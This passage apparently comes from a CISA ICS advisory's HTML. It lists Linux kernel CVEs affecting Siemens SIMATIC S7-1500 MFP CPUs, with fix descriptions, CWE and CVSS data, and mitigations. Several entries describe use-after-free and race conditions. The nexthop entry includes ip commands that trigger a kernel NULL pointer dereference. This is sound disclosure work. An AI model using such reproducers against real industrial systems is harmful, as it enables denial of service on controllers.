<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39871</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: idxd: Remove improper idxd_free The call to idxd_free() introduces a duplicate put_device() leading to a reference count underflow: refcount_t: underflow; use-after-free. WARNING: CPU: 15 PID: 4428 at lib/refcount.c:28 refcount_warn_saturate+0xbe/0x110 ... Call Trace: idxd_remove+0xe4/0x120 [idxd] pci_device_remove+0x3f/0xb0 device_release_driver_internal+0x197/0x200 driver_detach+0x48/0x90 bus_remove_driver+0x74/0xf0 pci_unregister_driver+0x2e/0xb0 idxd_exit_module+0x34/0x7a0 [idxd] __do_sys_delete_module.constprop.0+0x183/0x280 do_syscall_64+0x54/0xd70 entry_SYSCALL_64_after_hwframe+0x76/0x7e The idxd_unregister_devices() which is invoked at the very beginning of idxd_remove(), already takes care of the necessary put_device() through the following call path: idxd_unregister_devices() -&gt; device_unregister() -&gt; put_device() In addition, when CONFIG_DEBUG_KOBJECT_RELEASE is enabled, put_device() may trigger asynchronous cleanup via schedule_delayed_work(). If idxd_free() is called immediately after, it can result in a use-after-free. Remove the improper idxd_free() to avoid both the refcount underflow and potential memory corruption during module unload.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39871">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39931</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - Set merge to zero early in af_alg_sendmsg If an error causes af_alg_sendmsg to abort, ctx-&gt;merge may contain a garbage value from the previous loop. This may then trigger a crash on the next entry into af_alg_sendmsg when it attempts to do a merge that can't be done. Fix this by setting ctx-&gt;merge to zero near the start of the loop.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39931">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/457.html">CWE-457 Use of Uninitialized Variable</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39953</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: cgroup: split cgroup_destroy_wq into 3 workqueues A hung task can occur during [1] LTP cgroup testing when repeatedly mounting/unmounting perf_event and net_prio controllers with systemd.unified_cgroup_hierarchy=1. The hang manifests in cgroup_lock_and_drain_offline() during root destruction. Related case: cgroup_fj_function_perf_event cgroup_fj_function.sh perf_event cgroup_fj_function_net_prio cgroup_fj_function.sh net_prio Call Trace: cgroup_lock_and_drain_offline+0x14c/0x1e8 cgroup_destroy_root+0x3c/0x2c0 css_free_rwork_fn+0x248/0x338 process_one_work+0x16c/0x3b8 worker_thread+0x22c/0x3b0 kthread+0xec/0x100 ret_from_fork+0x10/0x20 Root Cause: CPU0 CPU1 mount perf_event umount net_prio cgroup1_get_tree cgroup_kill_sb rebind_subsystems // root destruction enqueues // cgroup_destroy_wq // kill all perf_event css // one perf_event css A is dying // css A offline enqueues cgroup_destroy_wq // root destruction will be executed first css_free_rwork_fn cgroup_destroy_root cgroup_lock_and_drain_offline // some perf descendants are dying // cgroup_destroy_wq max_active = 1 // waiting for css A to die Problem scenario: 1. CPU0 mounts perf_event (rebind_subsystems) 2. CPU1 unmounts net_prio (cgroup_kill_sb), queuing root destruction work 3. A dying perf_event CSS gets queued for offline after root destruction 4. Root destruction waits for offline completion, but offline work is blocked behind root destruction in cgroup_destroy_wq (max_active=1) Solution: Split cgroup_destroy_wq into three dedicated workqueues: cgroup_offline_wq – Handles CSS offline operations cgroup_release_wq – Manages resource release cgroup_free_wq – Performs final memory deallocation This separation eliminates blocking in the CSS free path while waiting for offline operations to complete. [1] https://github.com/linux-test-project/ltp/blob/master/runtest/controllers</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39953">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39955</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: tcp: Clear tcp_sk(sk)-&gt;fastopen_rsk in tcp_disconnect(). syzbot reported the splat below where a socket had tcp_sk(sk)-&gt;fastopen_rsk in the TCP_ESTABLISHED state. [0] syzbot reused the server-side TCP Fast Open socket as a new client before the TFO socket completes 3WHS: 1. accept() 2. connect(AF_UNSPEC) 3. connect() to another destination As of accept(), sk-&gt;sk_state is TCP_SYN_RECV, and tcp_disconnect() changes it to TCP_CLOSE and makes connect() possible, which restarts timers. Since tcp_disconnect() forgot to clear tcp_sk(sk)-&gt;fastopen_rsk, the retransmit timer triggered the warning and the intended packet was not retransmitted. Let's call reqsk_fastopen_remove() in tcp_disconnect(). [0]: WARNING: CPU: 2 PID: 0 at net/ipv4/tcp_timer.c:542 tcp_retransmit_timer (net/ipv4/tcp_timer.c:542 (discriminator 7)) Modules linked in: CPU: 2 UID: 0 PID: 0 Comm: swapper/2 Not tainted 6.17.0-rc5-g201825fb4278 #62 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 RIP: 0010:tcp_retransmit_timer (net/ipv4/tcp_timer.c:542 (discriminator 7)) Code: 41 55 41 54 55 53 48 8b af b8 08 00 00 48 89 fb 48 85 ed 0f 84 55 01 00 00 0f b6 47 12 3c 03 74 0c 0f b6 47 12 3c 04 74 04 90 &lt;0f&gt; 0b 90 48 8b 85 c0 00 00 00 48 89 ef 48 8b 40 30 e8 6a 4f 06 3e RSP: 0018:ffffc900002f8d40 EFLAGS: 00010293 RAX: 0000000000000002 RBX: ffff888106911400 RCX: 0000000000000017 RDX: 0000000002517619 RSI: ffffffff83764080 RDI: ffff888106911400 RBP: ffff888106d5c000 R08: 0000000000000001 R09: ffffc900002f8de8 R10: 00000000000000c2 R11: ffffc900002f8ff8 R12: ffff888106911540 R13: ffff888106911480 R14: ffff888106911840 R15: ffffc900002f8de0 FS: 0000000000000000(0000) GS:ffff88907b768000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f8044d69d90 CR3: 0000000002c30003 CR4: 0000000000370ef0 Call Trace: tcp_write_timer (net/ipv4/tcp_timer.c:738) call_timer_fn (kernel/time/timer.c:1747) __run_timers (kernel/time/timer.c:1799 kernel/time/timer.c:2372) timer_expire_remote (kernel/time/timer.c:2385 kernel/time/timer.c:2376 kernel/time/timer.c:2135) tmigr_handle_remote_up (kernel/time/timer_migration.c:944 kernel/time/timer_migration.c:1035) __walk_groups.isra.0 (kernel/time/timer_migration.c:533 (discriminator 1)) tmigr_handle_remote (kernel/time/timer_migration.c:1096) handle_softirqs (./arch/x86/include/asm/jump_label.h:36 ./include/trace/events/irq.h:142 kernel/softirq.c:580) irq_exit_rcu (kernel/softirq.c:614 kernel/softirq.c:453 kernel/softirq.c:680 kernel/softirq.c:696) sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1050 (discriminator 35) arch/x86/kernel/apic/apic.c:1050 (discriminator 35))</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39955">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/213.html">CWE-213 Exposure of Sensitive Information Due to Incompatible Policies</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39964</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - Disallow concurrent writes in af_alg_sendmsg Issuing two writes to the same af_alg socket is bogus as the data will be interleaved in an unpredictable fashion. Furthermore, concurrent writes may create inconsistencies in the internal socket state. Disallow this by adding a new ctx-&gt;write field that indiciates exclusive ownership for writing.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39964">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39977</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: futex: Prevent use-after-free during requeue-PI syzbot managed to trigger the following race: T1 T2 futex_wait_requeue_pi() futex_do_wait() schedule() futex_requeue() futex_proxy_trylock_atomic() futex_requeue_pi_prepare() requeue_pi_wake_futex() futex_requeue_pi_complete() /* preempt */ * timeout/ signal wakes T1 * futex_requeue_pi_wakeup_sync() // Q_REQUEUE_PI_LOCKED futex_hash_put() // back to userland, on stack futex_q is garbage /* back */ wake_up_state(q-&gt;task, TASK_NORMAL); In this scenario futex_wait_requeue_pi() is able to leave without using futex_q::lock_ptr for synchronization. This can be prevented by reading futex_q::task before updating the futex_q::requeue_state. A reference on the task_struct is not needed because requeue_pi_wake_futex() is invoked with a spinlock_t held which implies a RCU read section. Even if T1 terminates immediately after, the task_struct will remain valid during T2's wake_up_state(). A READ_ONCE on futex_q::task before futex_requeue_pi_complete() is enough because it ensures that the variable is read before the state is updated. Read futex_q::task before updating the requeue state, use it for the following wakeup.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39977">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39978</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: octeontx2-pf: Fix potential use after free in otx2_tc_add_flow() This code calls kfree_rcu(new_node, rcu) and then dereferences "new_node" and then dereferences it on the next line. Two lines later, we take a mutex so I don't think this is an RCU safe region. Re-order it to do the dereferences before queuing up the free.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39978">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39980</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: nexthop: Forbid FDB status change while nexthop is in a group The kernel forbids the creation of non-FDB nexthop groups with FDB nexthops: # ip nexthop add id 1 via 192.0.2.1 fdb # ip nexthop add id 2 group 1 Error: Non FDB nexthop group cannot have fdb nexthops. And vice versa: # ip nexthop add id 3 via 192.0.2.2 dev dummy1 # ip nexthop add id 4 group 3 fdb Error: FDB nexthop group can only have fdb nexthops. However, as long as no routes are pointing to a non-FDB nexthop group, the kernel allows changing the type of a nexthop from FDB to non-FDB and vice versa: # ip nexthop add id 5 via 192.0.2.2 dev dummy1 # ip nexthop add id 6 group 5 # ip nexthop replace id 5 via 192.0.2.2 fdb # echo $? 0 This configuration is invalid and can result in a NPD [1] since FDB nexthops are not associated with a nexthop device: # ip route add 198.51.100.1/32 nhid 6 # ping 198.51.100.1 Fix by preventing nexthop FDB status change while the nexthop is in a group: # ip nexthop add id 7 via 192.0.2.2 dev dummy1 # ip nexthop add id 8 group 7 # ip nexthop replace id 7 via 192.0.2.2 fdb Error: Cannot change nexthop FDB status while in a group. [1] BUG: kernel NULL pointer dereference, address: 00000000000003c0 [...] Oops: Oops: 0000 [#1] SMP CPU: 6 UID: 0 PID: 367 Comm: ping Not tainted 6.17.0-rc6-virtme-gb65678cacc03 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-4.fc41 04/01/2014 RIP: 0010:fib_lookup_good_nhc+0x1e/0x80 [...] Call Trace: fib_table_lookup+0x541/0x650 ip_route_output_key_hash_rcu+0x2ea/0x970 ip_route_output_key_hash+0x55/0x80 __ip4_datagram_connect+0x250/0x330 udp_connect+0x2b/0x60 __sys_connect+0x9c/0xd0 __x64_sys_connect+0x18/0x20 do_syscall_64+0xa4/0x2a0 entry_SYSCALL_64_after_hwframe+0x4b/0x53</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39980">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40022</a></h3>
<div class="csaf-accordion-content">
